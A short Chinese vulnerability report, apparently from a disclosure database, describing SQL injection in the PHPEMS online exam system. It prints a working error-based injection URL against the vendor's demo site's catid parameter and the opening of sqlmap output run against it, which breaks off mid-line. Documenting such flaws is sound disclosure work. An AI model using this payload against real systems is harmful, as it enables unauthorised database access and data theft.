phpems在线考试模拟系统sql注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 擦 ### 详细说明: 没学过面向对象,看不懂代码,完全黑盒出来的 ### 漏洞证明: demo测试 ``` http://phpems.net/2014/index.php?content-app-category&catid=2)%20AND%20%28SELECT%207082%20FROM%28SELECT%20COUNT%28*%29%20,CONCAT%280x3a6c787a3a,%28SELECT%20%28CASE%20WHEN%20%287082=7082%29%20THEN%201%20ELSE%200%20END%29%29,0x3a7771%207a3a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286356=6356 ``` ``` 注入地址:http://phpems.net/2014/index.php?content-app-category&catid=2 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 00:06:41 [00:06:42] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息